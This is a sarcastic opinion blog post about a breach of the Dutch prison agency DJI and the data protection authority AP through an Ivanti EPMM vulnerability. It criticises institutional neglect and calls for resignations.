Skip to main content

The DJI and AP Collapse: A Masterclass in Institutional Hypocrisy

·334 words
Ronny Roethof
Author
Ronny Roethof
A security-minded sysadmin who fights corporate BS with open source weapons and sarcasm
Table of Contents

Summary
#

The DJI (Dienst Justitiële Inrichtingen), the Dutch prison and custodial agency responsible for inmate management and staff safety, suffered a major cybersecurity failure that exposes the fragility of Dutch government IT. Hackers maintained Remote Code Execution (RCE) access for five months, trading the safety of 16,000 justice officials for operational neglect. This breach goes beyond a simple data leak: attackers exploited Ivanti EPMM to execute arbitrary code, effectively taking control of devices rather than merely accessing data. Experts agree that patches alone are insufficient; the systems must be considered compromised, and a full rebuild is the only safe path.

The Hypocrisy of the Watchdog
#

The irony deepens when we consider that the Autoriteit Persoonsgegevens (AP) fell victim to the exact same Ivanti flaw. How can the AP credibly fine private companies for “insufficient security” when it fails to protect its own infrastructure from a known vulnerability? This isn’t merely an IT failure; it is a failure of institutional accountability.

Institutional Neglect and the Culture of ‘MicroSLOP’
#

The human consequences are immediate: directives and prison staff are now at risk of blackmail. DJI’s advice to staff to “turn off location data” does nothing to mitigate five months of historical tracking. Beyond this, the organization’s culture—dubbed “MicroSLOP” by industry peers—prioritizes low-quality, high-maintenance enterprise software over resilient, secure architecture, leaving systemic vulnerabilities unaddressed.

Professional Reality
#

This pattern is familiar across Dutch institutions, including RIVM. Leadership often remains in “Plato’s Cave,” fixated on compliance metrics while real servers burn. Warnings are ignored, promises are broken, and surprise follows predictably when supposedly secure systems are compromised.

Final Verdict
#

If you cannot secure the people who secure prisoners, you have lost control. DJI’s top management and AP leadership must be held accountable. No more “zorgelijke situatie” press releases—resignations are warranted. In cases of deep compromise, patching is not enough; the only solution is to burn it down and start over. Yet in Den Haag, the likely response will be to invest in more “MicroSLOP.”

Related

The Badge, The Burnout, and the Backdoor: Why Scammers Love Your CISO
·639 words
How burnout and gamification create easy targets for social engineering attacks on enterprise admins.
The Digital Trump Moment: The Bill for Our Collective Negligence Is Due
·1080 words
How collective IT negligence and geopolitical decisions expose systemic risks in digital sovereignty.
The State of SSH: Neglect Disguised as Stability
·740 words
SSH infrastructure is often treated as stable, but neglect can create hidden vulnerabilities in enterprise environments.